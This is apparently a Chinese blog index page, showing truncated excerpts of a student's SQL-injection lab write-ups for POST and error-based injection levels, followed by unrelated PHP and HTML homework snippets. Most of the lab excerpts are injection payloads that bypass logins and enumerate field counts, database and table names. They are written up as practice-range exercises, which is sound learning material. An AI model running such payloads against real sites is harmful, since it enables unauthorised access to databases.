小黑 6.6.3-SQL注入-Post注入Rank 3 解题笔记
')or 1=1# 登陆成功')or 1=2 order by 2# 测试得到有两个字段')or 1=2 union select 1,2# 成功,但无回显')or 1=2 union select 1,database()# 无回显 此时尝试布尔注入')or (lenght(database()))>7# 测试得到数据库长度为8')
小黑 6.6.2-SQL注入-Post注入Rank 2 解题笔记
' 错误'or 1=1# 错误根据靶场sql语句思考")or 1=1# 登陆成功")or 1=2 order by 2# 多次尝试发现字段数为2")or 1=2 union select 1,2# 回显注入点")or 1=2 union select 1,group_concat(database())# 得到库名:security"
小黑 6.6.1-SQL注入-Post注入Rank 1 解题笔记
' 报错 得知此处有注入漏洞'or 1=1 # 成功登陆'or 1=1 order by 2# by出字段数为2'or 1=2 union select 1,2# 爆出注入点'or 1=2 union select 1,database()# 得到库名security'or 1=2 union select 1,group_concat(table_
小黑 6.1.4-SQL注入-显错注入Rank 4 解题笔记
?id=1 正常根据靶场提示料及sql语句?id=1") --+ 正常?id=1") order by 3--+ 得到字段数?id=0") union select 1,2,3 --+得到注入点?id=0") union select 1,2,database() --+ 得到库名security?id=0") union select 1,2,g
小黑 6.1.3-SQL注入-显错注入Rank 3 解题笔记
?id=1 正常?id=1' 错误?id=1 order by 5 正常综上和靶场提示看到语句执行为 id=('')?id=1') order by 5 --+ 回显错误,3正常 说明已执行?id=1') u
小黑 6.1.2-SQL注入-显错注入Rank 2 解题笔记
?id=1 有回显?id=1 order by 3 查询到有3个字段,列?id=1 union select 1,2,3 报错?id=1 union select 1,2,3 --+ 正常?id=1 union select 1,2,3 limit 1,1 回显出2,3 得到输出点?id=1 union select 1,2,group_concat(database()) limit 1,1 -
小黑 6.1.1-SQL注入-显错注入Rank 1 解题笔记
sleep(5) 显示not found?id=1 sleep(5) 无效?id=1 显示正常?id=1' 显示错误此时判断可以进行sql注入根据靶场sql语句提示已初步了解?id=1 order by 5 无反应看反馈得知''里有两条执行语句?id=1 and order by 5 也无效?id=1' order by 5 --+ 注释掉了后面发现可执行 聂风教的
3.6、正则表达式【作业】
<?php$a=fopen("1.txt","r")or die("打不开文件");$b=fread($a,filesize("1.txt"));fclose($a);$b=preg_replace('/<phoneticpr fontId="1'' type="
3.5、PHP表单验证【作业】
<!DOCTYPE html><html><body><?php$servername = "localhost";$username = "root";$password = "root";$dbname = "mysql";$conn = new mysqli($serve
2.3&2.4、DIV+CSS【作业】
<!DOCTYPE HTML><html> <head> <meta charset="UTF-8"> <title>QQ空间-分享生活,留住感动</title>